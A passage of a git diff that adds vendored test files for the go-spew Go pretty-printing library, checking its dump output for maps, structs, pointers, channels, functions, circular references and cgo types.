+ "\"two\": (" + mt2 + ") 2,\n (" + mt1 + ") (len=" + klen +
+ ") \"one\": (" + mt2 + ") 1\n}"
+ addDumpTest(m, "("+mt+") "+ms+"\n", "("+mt+") "+ms2+"\n")
+ addDumpTest(pm, "(*"+mt+")("+mAddr+")("+ms+")\n",
+ "(*"+mt+")("+mAddr+")("+ms2+")\n")
+ addDumpTest(&pm, "(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms+")\n",
+ "(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms2+")\n")
+ addDumpTest(nm, "(*"+mt+")()\n")
+ addDumpTest(nilMap, "("+mt+") \n")
+
+ // Map with custom formatter type on pointer receiver only keys and vals.
+ k2 := pstringer("one")
+ v2 := pstringer("1")
+ m2 := map[pstringer]pstringer{k2: v2}
+ k2Len := fmt.Sprintf("%d", len(k2))
+ v2Len := fmt.Sprintf("%d", len(v2))
+ m2Len := fmt.Sprintf("%d", len(m2))
+ nilMap2 := map[pstringer]pstringer(nil)
+ nm2 := (*map[pstringer]pstringer)(nil)
+ pm2 := &m2
+ m2Addr := fmt.Sprintf("%p", pm2)
+ pm2Addr := fmt.Sprintf("%p", &pm2)
+ m2t := "map[spew_test.pstringer]spew_test.pstringer"
+ m2t1 := "spew_test.pstringer"
+ m2t2 := "spew_test.pstringer"
+ m2s := "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len + ") " +
+ "stringer one: (" + m2t2 + ") (len=" + v2Len + ") stringer 1\n}"
+ if spew.UnsafeDisabled {
+ m2s = "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len +
+ ") " + "\"one\": (" + m2t2 + ") (len=" + v2Len +
+ ") \"1\"\n}"
+ }
+ addDumpTest(m2, "("+m2t+") "+m2s+"\n")
+ addDumpTest(pm2, "(*"+m2t+")("+m2Addr+")("+m2s+")\n")
+ addDumpTest(&pm2, "(**"+m2t+")("+pm2Addr+"->"+m2Addr+")("+m2s+")\n")
+ addDumpTest(nm2, "(*"+m2t+")()\n")
+ addDumpTest(nilMap2, "("+m2t+") \n")
+
+ // Map with interface keys and values.
+ k3 := "one"
+ k3Len := fmt.Sprintf("%d", len(k3))
+ m3 := map[interface{}]interface{}{k3: 1}
+ m3Len := fmt.Sprintf("%d", len(m3))
+ nilMap3 := map[interface{}]interface{}(nil)
+ nm3 := (*map[interface{}]interface{})(nil)
+ pm3 := &m3
+ m3Addr := fmt.Sprintf("%p", pm3)
+ pm3Addr := fmt.Sprintf("%p", &pm3)
+ m3t := "map[interface {}]interface {}"
+ m3t1 := "string"
+ m3t2 := "int"
+ m3s := "(len=" + m3Len + ") {\n (" + m3t1 + ") (len=" + k3Len + ") " +
+ "\"one\": (" + m3t2 + ") 1\n}"
+ addDumpTest(m3, "("+m3t+") "+m3s+"\n")
+ addDumpTest(pm3, "(*"+m3t+")("+m3Addr+")("+m3s+")\n")
+ addDumpTest(&pm3, "(**"+m3t+")("+pm3Addr+"->"+m3Addr+")("+m3s+")\n")
+ addDumpTest(nm3, "(*"+m3t+")()\n")
+ addDumpTest(nilMap3, "("+m3t+") \n")
+
+ // Map with nil interface value.
+ k4 := "nil"
+ k4Len := fmt.Sprintf("%d", len(k4))
+ m4 := map[string]interface{}{k4: nil}
+ m4Len := fmt.Sprintf("%d", len(m4))
+ nilMap4 := map[string]interface{}(nil)
+ nm4 := (*map[string]interface{})(nil)
+ pm4 := &m4
+ m4Addr := fmt.Sprintf("%p", pm4)
+ pm4Addr := fmt.Sprintf("%p", &pm4)
+ m4t := "map[string]interface {}"
+ m4t1 := "string"
+ m4t2 := "interface {}"
+ m4s := "(len=" + m4Len + ") {\n (" + m4t1 + ") (len=" + k4Len + ")" +
+ " \"nil\": (" + m4t2 + ") \n}"
+ addDumpTest(m4, "("+m4t+") "+m4s+"\n")
+ addDumpTest(pm4, "(*"+m4t+")("+m4Addr+")("+m4s+")\n")
+ addDumpTest(&pm4, "(**"+m4t+")("+pm4Addr+"->"+m4Addr+")("+m4s+")\n")
+ addDumpTest(nm4, "(*"+m4t+")()\n")
+ addDumpTest(nilMap4, "("+m4t+") \n")
+}
+
+func addStructDumpTests() {
+ // Struct with primitives.
+ type s1 struct {
+ a int8
+ b uint8
+ }
+ v := s1{127, 255}
+ nv := (*s1)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.s1"
+ vt2 := "int8"
+ vt3 := "uint8"
+ vs := "{\n a: (" + vt2 + ") 127,\n b: (" + vt3 + ") 255\n}"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Struct that contains another struct.
+ type s2 struct {
+ s1 s1
+ b bool
+ }
+ v2 := s2{s1{127, 255}, true}
+ nv2 := (*s2)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.s2"
+ v2t2 := "spew_test.s1"
+ v2t3 := "int8"
+ v2t4 := "uint8"
+ v2t5 := "bool"
+ v2s := "{\n s1: (" + v2t2 + ") {\n a: (" + v2t3 + ") 127,\n b: (" +
+ v2t4 + ") 255\n },\n b: (" + v2t5 + ") true\n}"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+
+ // Struct that contains custom type with Stringer pointer interface via both
+ // exported and unexported fields.
+ type s3 struct {
+ s pstringer
+ S pstringer
+ }
+ v3 := s3{"test", "test2"}
+ nv3 := (*s3)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "spew_test.s3"
+ v3t2 := "spew_test.pstringer"
+ v3s := "{\n s: (" + v3t2 + ") (len=4) stringer test,\n S: (" + v3t2 +
+ ") (len=5) stringer test2\n}"
+ v3sp := v3s
+ if spew.UnsafeDisabled {
+ v3s = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" +
+ v3t2 + ") (len=5) \"test2\"\n}"
+ v3sp = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" +
+ v3t2 + ") (len=5) stringer test2\n}"
+ }
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3sp+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3sp+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Struct that contains embedded struct and field to same struct.
+ e := embed{"embedstr"}
+ eLen := fmt.Sprintf("%d", len("embedstr"))
+ v4 := embedwrap{embed: &e, e: &e}
+ nv4 := (*embedwrap)(nil)
+ pv4 := &v4
+ eAddr := fmt.Sprintf("%p", &e)
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "spew_test.embedwrap"
+ v4t2 := "spew_test.embed"
+ v4t3 := "string"
+ v4s := "{\n embed: (*" + v4t2 + ")(" + eAddr + ")({\n a: (" + v4t3 +
+ ") (len=" + eLen + ") \"embedstr\"\n }),\n e: (*" + v4t2 +
+ ")(" + eAddr + ")({\n a: (" + v4t3 + ") (len=" + eLen + ")" +
+ " \"embedstr\"\n })\n}"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+}
+
+func addUintptrDumpTests() {
+ // Null pointer.
+ v := uintptr(0)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "uintptr"
+ vs := ""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+
+ // Address of real variable.
+ i := 1
+ v2 := uintptr(unsafe.Pointer(&i))
+ nv2 := (*uintptr)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uintptr"
+ v2s := fmt.Sprintf("%p", &i)
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+}
+
+func addUnsafePointerDumpTests() {
+ // Null pointer.
+ v := unsafe.Pointer(uintptr(0))
+ nv := (*unsafe.Pointer)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "unsafe.Pointer"
+ vs := ""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Address of real variable.
+ i := 1
+ v2 := unsafe.Pointer(&i)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "unsafe.Pointer"
+ v2s := fmt.Sprintf("%p", &i)
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+}
+
+func addChanDumpTests() {
+ // Nil channel.
+ var v chan int
+ pv := &v
+ nv := (*chan int)(nil)
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "chan int"
+ vs := ""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Real channel.
+ v2 := make(chan int)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "chan int"
+ v2s := fmt.Sprintf("%p", v2)
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+}
+
+func addFuncDumpTests() {
+ // Function with no params and no returns.
+ v := addIntDumpTests
+ nv := (*func())(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "func()"
+ vs := fmt.Sprintf("%p", v)
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Function with param and no returns.
+ v2 := TestDump
+ nv2 := (*func(*testing.T))(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "func(*testing.T)"
+ v2s := fmt.Sprintf("%p", v2)
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+
+ // Function with multiple params and multiple returns.
+ var v3 = func(i int, s string) (b bool, err error) {
+ return true, nil
+ }
+ nv3 := (*func(int, string) (bool, error))(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "func(int, string) (bool, error)"
+ v3s := fmt.Sprintf("%p", v3)
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+}
+
+func addCircularDumpTests() {
+ // Struct that is circular through self referencing.
+ type circular struct {
+ c *circular
+ }
+ v := circular{nil}
+ v.c = &v
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.circular"
+ vs := "{\n c: (*" + vt + ")(" + vAddr + ")({\n c: (*" + vt + ")(" +
+ vAddr + ")()\n })\n}"
+ vs2 := "{\n c: (*" + vt + ")(" + vAddr + ")()\n}"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs2+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs2+")\n")
+
+ // Structs that are circular through cross referencing.
+ v2 := xref1{nil}
+ ts2 := xref2{&v2}
+ v2.ps2 = &ts2
+ pv2 := &v2
+ ts2Addr := fmt.Sprintf("%p", &ts2)
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.xref1"
+ v2t2 := "spew_test.xref2"
+ v2s := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n ps1: (*" + v2t +
+ ")(" + v2Addr + ")({\n ps2: (*" + v2t2 + ")(" + ts2Addr +
+ ")()\n })\n })\n}"
+ v2s2 := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n ps1: (*" + v2t +
+ ")(" + v2Addr + ")()\n })\n}"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s2+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s2+")\n")
+
+ // Structs that are indirectly circular.
+ v3 := indirCir1{nil}
+ tic2 := indirCir2{nil}
+ tic3 := indirCir3{&v3}
+ tic2.ps3 = &tic3
+ v3.ps2 = &tic2
+ pv3 := &v3
+ tic2Addr := fmt.Sprintf("%p", &tic2)
+ tic3Addr := fmt.Sprintf("%p", &tic3)
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "spew_test.indirCir1"
+ v3t2 := "spew_test.indirCir2"
+ v3t3 := "spew_test.indirCir3"
+ v3s := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n ps3: (*" + v3t3 +
+ ")(" + tic3Addr + ")({\n ps1: (*" + v3t + ")(" + v3Addr +
+ ")({\n ps2: (*" + v3t2 + ")(" + tic2Addr +
+ ")()\n })\n })\n })\n}"
+ v3s2 := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n ps3: (*" + v3t3 +
+ ")(" + tic3Addr + ")({\n ps1: (*" + v3t + ")(" + v3Addr +
+ ")()\n })\n })\n}"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s2+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s2+")\n")
+}
+
+func addPanicDumpTests() {
+ // Type that panics in its Stringer interface.
+ v := panicer(127)
+ nv := (*panicer)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.panicer"
+ vs := "(PANIC=test panic)127"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+}
+
+func addErrorDumpTests() {
+ // Type that has a custom Error interface.
+ v := customError(127)
+ nv := (*customError)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.customError"
+ vs := "error: 127"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+}
+
+// TestDump executes all of the tests described by dumpTests.
+func TestDump(t *testing.T) {
+ // Set up tests.
+ addIntDumpTests()
+ addUintDumpTests()
+ addBoolDumpTests()
+ addFloatDumpTests()
+ addComplexDumpTests()
+ addArrayDumpTests()
+ addSliceDumpTests()
+ addStringDumpTests()
+ addInterfaceDumpTests()
+ addMapDumpTests()
+ addStructDumpTests()
+ addUintptrDumpTests()
+ addUnsafePointerDumpTests()
+ addChanDumpTests()
+ addFuncDumpTests()
+ addCircularDumpTests()
+ addPanicDumpTests()
+ addErrorDumpTests()
+ addCgoDumpTests()
+
+ t.Logf("Running %d tests", len(dumpTests))
+ for i, test := range dumpTests {
+ buf := new(bytes.Buffer)
+ spew.Fdump(buf, test.in)
+ s := buf.String()
+ if testFailed(s, test.wants) {
+ t.Errorf("Dump #%d\n got: %s %s", i, s, stringizeWants(test.wants))
+ continue
+ }
+ }
+}
+
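+// TestDumpSortedKeys ensures maps are dumped with their keys in sorted order
+// when the SortKeys option is enabled on a ConfigState.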
+func TestDumpSortedKeys(t *testing.T) {
+ cfg := spew.ConfigState{SortKeys: true}
+ s := cfg.Sdump(map[int]string{1: "1", 3: "3", 2: "2"})
+ expected := "(map[int]string) (len=3) {\n(int) 1: (string) (len=1) " +
+ "\"1\",\n(int) 2: (string) (len=1) \"2\",\n(int) 3: (string) " +
+ "(len=1) \"3\"\n" +
+ "}\n"
+ if s != expected {
+ t.Errorf("Sorted keys mismatch:\n %v %v", s, expected)
+ }
+
+ s = cfg.Sdump(map[stringer]int{"1": 1, "3": 3, "2": 2})
+ expected = "(map[spew_test.stringer]int) (len=3) {\n" +
+ "(spew_test.stringer) (len=1) stringer 1: (int) 1,\n" +
+ "(spew_test.stringer) (len=1) stringer 2: (int) 2,\n" +
+ "(spew_test.stringer) (len=1) stringer 3: (int) 3\n" +
+ "}\n"
+ if s != expected {
+ t.Errorf("Sorted keys mismatch:\n %v %v", s, expected)
+ }
+
+ s = cfg.Sdump(map[pstringer]int{pstringer("1"): 1, pstringer("3"): 3, pstringer("2"): 2})
+ expected = "(map[spew_test.pstringer]int) (len=3) {\n" +
+ "(spew_test.pstringer) (len=1) stringer 1: (int) 1,\n" +
+ "(spew_test.pstringer) (len=1) stringer 2: (int) 2,\n" +
+ "(spew_test.pstringer) (len=1) stringer 3: (int) 3\n" +
+ "}\n"
+ if spew.UnsafeDisabled {
+ expected = "(map[spew_test.pstringer]int) (len=3) {\n" +
+ "(spew_test.pstringer) (len=1) \"1\": (int) 1,\n" +
+ "(spew_test.pstringer) (len=1) \"2\": (int) 2,\n" +
+ "(spew_test.pstringer) (len=1) \"3\": (int) 3\n" +
+ "}\n"
+ }
+ if s != expected {
+ t.Errorf("Sorted keys mismatch:\n %v %v", s, expected)
+ }
+
+ s = cfg.Sdump(map[customError]int{customError(1): 1, customError(3): 3, customError(2): 2})
+ expected = "(map[spew_test.customError]int) (len=3) {\n" +
+ "(spew_test.customError) error: 1: (int) 1,\n" +
+ "(spew_test.customError) error: 2: (int) 2,\n" +
+ "(spew_test.customError) error: 3: (int) 3\n" +
+ "}\n"
+ if s != expected {
+ t.Errorf("Sorted keys mismatch:\n %v %v", s, expected)
+ }
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go
new file mode 100644
index 0000000000..6ab180809a
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go
@@ -0,0 +1,99 @@
+// Copyright (c) 2013-2016 Dave Collins
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when both cgo is supported and "-tags testcgo" is added to the go test
+// command line. This means the cgo tests are only added (and hence run) when
+// specifically requested. This configuration is used because spew itself
+// does not require cgo to run even though it does handle certain cgo types
+// specially. Rather than forcing all clients to require cgo and an external
+// C compiler just to run the tests, this scheme makes them optional.
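+// For example, a test run that includes them might look like:
+// go test -tags testcgo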
+// +build cgo,testcgo
+
+package spew_test
+
+import (
+ "fmt"
+
+ "github.com/davecgh/go-spew/spew/testdata"
+)
+
+func addCgoDumpTests() {
+ // C char pointer.
+ v := testdata.GetCgoCharPointer()
+ nv := testdata.GetCgoNullCharPointer()
+ pv := &v
+ vcAddr := fmt.Sprintf("%p", v)
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "*testdata._Ctype_char"
+ vs := "116"
+ addDumpTest(v, "("+vt+")("+vcAddr+")("+vs+")\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+"->"+vcAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+"->"+vcAddr+")("+vs+")\n")
+ addDumpTest(nv, "("+vt+")()\n")
+
+ // C char array.
+ v2, v2l, v2c := testdata.GetCgoCharArray()
+ v2Len := fmt.Sprintf("%d", v2l)
+ v2Cap := fmt.Sprintf("%d", v2c)
+ v2t := "[6]testdata._Ctype_char"
+ v2s := "(len=" + v2Len + " cap=" + v2Cap + ") " +
+ "{\n 00000000 74 65 73 74 32 00 " +
+ " |test2.|\n}"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+
+ // C unsigned char array.
+ v3, v3l, v3c := testdata.GetCgoUnsignedCharArray()
+ v3Len := fmt.Sprintf("%d", v3l)
+ v3Cap := fmt.Sprintf("%d", v3c)
+ v3t := "[6]testdata._Ctype_unsignedchar"
+ v3t2 := "[6]testdata._Ctype_uchar"
+ v3s := "(len=" + v3Len + " cap=" + v3Cap + ") " +
+ "{\n 00000000 74 65 73 74 33 00 " +
+ " |test3.|\n}"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n", "("+v3t2+") "+v3s+"\n")
+
+ // C signed char array.
+ v4, v4l, v4c := testdata.GetCgoSignedCharArray()
+ v4Len := fmt.Sprintf("%d", v4l)
+ v4Cap := fmt.Sprintf("%d", v4c)
+ v4t := "[6]testdata._Ctype_schar"
+ v4t2 := "testdata._Ctype_schar"
+ v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " +
+ "{\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 101,\n (" + v4t2 +
+ ") 115,\n (" + v4t2 + ") 116,\n (" + v4t2 + ") 52,\n (" + v4t2 +
+ ") 0\n}"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+
+ // C uint8_t array.
+ v5, v5l, v5c := testdata.GetCgoUint8tArray()
+ v5Len := fmt.Sprintf("%d", v5l)
+ v5Cap := fmt.Sprintf("%d", v5c)
+ v5t := "[6]testdata._Ctype_uint8_t"
+ v5s := "(len=" + v5Len + " cap=" + v5Cap + ") " +
+ "{\n 00000000 74 65 73 74 35 00 " +
+ " |test5.|\n}"
+ addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+
+ // C typedefed unsigned char array.
+ v6, v6l, v6c := testdata.GetCgoTypdefedUnsignedCharArray()
+ v6Len := fmt.Sprintf("%d", v6l)
+ v6Cap := fmt.Sprintf("%d", v6c)
+ v6t := "[6]testdata._Ctype_custom_uchar_t"
+ v6s := "(len=" + v6Len + " cap=" + v6Cap + ") " +
+ "{\n 00000000 74 65 73 74 36 00 " +
+ " |test6.|\n}"
+ addDumpTest(v6, "("+v6t+") "+v6s+"\n")
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go
new file mode 100644
index 0000000000..52a0971fb3
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dumpnocgo_test.go
@@ -0,0 +1,26 @@
+// Copyright (c) 2013 Dave Collins
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when either cgo is not supported or "-tags testcgo" is not added to the go
+// test command line. This file intentionally does not set up any cgo tests in
+// this scenario.
+// +build !cgo !testcgo
+
+package spew_test
+
+func addCgoDumpTests() {
+ // Don't add any tests for cgo since this file is only compiled when
+ // there should not be any cgo tests.
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/example_test.go b/vendor/github.com/davecgh/go-spew/spew/example_test.go
new file mode 100644
index 0000000000..c6ec8c6d59
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/example_test.go
@@ -0,0 +1,226 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew_test
+
+import (
+ "fmt"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+type Flag int
+
+const (
+ flagOne Flag = iota
+ flagTwo
+)
+
+var flagStrings = map[Flag]string{
+ flagOne: "flagOne",
+ flagTwo: "flagTwo",
+}
+
+func (f Flag) String() string {
+ if s, ok := flagStrings[f]; ok {
+ return s
+ }
+ return fmt.Sprintf("Unknown flag (%d)", int(f))
+}
+
+type Bar struct {
+ data uintptr
+}
+
+type Foo struct {
+ unexportedField Bar
+ ExportedField map[interface{}]interface{}
+}
+
+// This example demonstrates how to use Dump to dump variables to stdout.
+func ExampleDump() {
+ // The following package level declarations are assumed for this example:
+ /*
+ type Flag int
+
+ const (
+ flagOne Flag = iota
+ flagTwo
+ )
+
+ var flagStrings = map[Flag]string{
+ flagOne: "flagOne",
+ flagTwo: "flagTwo",
+ }
+
+ func (f Flag) String() string {
+ if s, ok := flagStrings[f]; ok {
+ return s
+ }
+ return fmt.Sprintf("Unknown flag (%d)", int(f))
+ }
+
+ type Bar struct {
+ data uintptr
+ }
+
+ type Foo struct {
+ unexportedField Bar
+ ExportedField map[interface{}]interface{}
+ }
+ */
+
+ // Set up some sample data structures for the example.
+ bar := Bar{uintptr(0)}
